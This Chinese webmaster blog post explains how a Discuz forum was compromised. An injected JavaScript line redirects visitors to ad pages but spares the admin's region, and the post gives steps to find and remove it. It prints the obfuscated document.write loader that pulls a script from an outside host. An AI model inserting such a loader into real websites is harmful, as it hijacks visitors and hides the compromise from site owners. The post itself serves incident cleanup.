当前位置:首页 > 网站运营 > 正文内容

discuz网站被挂马,非管理员访问自动跳转到广告页面 怎么解决

葱子9年前 (2017-04-27)网站运营2647

你是否遇到过你的网站打开一会就自动跳转到其他页面,而且这个问题是你的用户告诉你的,而你自己却没有遇到?

discuz挂马弹出页面

经过葱子我细心的对挂马网站做排查,终于让我找到了问题所在。

挂马者是通过在discuz的头部js文件里面添加了劫持js代码,通过判断访问者的IP来实现不同跳转的。

具体代码如下:

document.write(“<\163”+”cript src=’http://\141”+”d.\172”+”om”+”12\63”+”.n”+”et/i”+”p.asp?l”+”oc=chengdu’><\/s”+”cript>”);

可以看出,后面有个“chengdu”代码,这段代码的意思就是IP为成都地区的访问者在访问被挂马页面时不做跳转。其余地区的IP访问者则跳转。

从这段代码我们就可以看出挂马者是多么的用心险恶。

他首先根据你网站所在地进行判断网站管理员经常使用的IP地址所在地,然后有针对性的对网站管理员不做跳转劫持。

所以,这种劫持的情况下,网站管理者非常难以发现到网站被挂马了。

解决办法也比较简单:

首先校验下原始文件,对比下哪些js文件近期有被改动过,然后针对被改动过的js文件做以上代码段的排除。找到以上代码段后,删除即可。

最后说一下,各位网站管理者一定要注意保管好网站和服务器的管理密码,尽量设置的复杂一点。同时也要及时检测服务器是否存在漏洞等,及时做针对性处理,以避免类似的事情再发生。

以上文章为向上的葱子原创,转载请注明出处。

原文地址:https://www.aitiancheng.com/article-491.html

扫描二维码推送至手机访问。

版权声明:本文由葱子博客发布,如需转载请注明出处。

本文链接:https://www.aitiancheng.com/article-491.html

相关文章

为什么有必要对网站开启https?

—— 互联网HTTPS时代,开启HTTPS迫在眉睫!—— 2014年Google将未启用HTTPS传输的网站标记为不信任! 2015年国内最大的搜索引擎百度率先实现了全站HTTPS加密! 2016年淘宝天猫全站...

代码适配的网站如何优化

来自百度站长官方文档: 为了使百度能够知道当您的页面发生变化时,同时需要用其他的ua重新抓取一遍,请您添加Vary HTTP标头。Vary HTTP 标头具有以下两个非常重要且实用的作用:  a) 它会向 ISP 和其他位置使用的缓存...

葱子的wordpress博客开启https访问了:解决百度分享、畅言无法使用的问题

葱子的wordpress博客开启https访问了:解决百度分享、畅言无法使用的问题

我的博客一直是放在阿里云虚拟主机上面的,今天因为虚拟主机快到期的缘故,将博客转移到了自己的独立ECS服务器上面了。 借着wordpress博客搬家这个机会,一并将博客的https也给开启了。 下面我简单...

又一家!汇同资源网顺利通过百度站长平台HTTPS认证!

又一家!汇同资源网顺利通过百度站长平台HTTPS认证!

汇同资源网的站长墨痕今天联系到我,让我帮忙付费配置HTTPS,保证通过百度站长平台的HTTPS认证。 我向他了解了下他网站目前的HTTPS配置情况: 1、网站的web程序使用的Apache 2、网站已完成discuz相关源文件的...

windows server2008中为IIS7开启https的TLS1_2协议

windows server2008中为IIS7开启https的TLS1_2协议

我们在IIS7上配置了SSL证书后,使用ATS检测,发现服务器不支持TLS1_2协议。 经查询发现,在IIS7中TLS1_2协议是默认关闭的。 所以我们需要对IIS做下设置,来开启...

如何在电脑上访问手机页面?试试这个chrome插件

如何在电脑上访问手机页面?试试这个chrome插件

有时候需要在PC电脑上网访问下手机页面,每次都要去打开手机,有点小麻烦。 这里葱子我分享给大家一个chrome插件,直接安装在chrome浏览器上就可以访问手机页面了。 怎么使用:看截图,一目了然。...

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。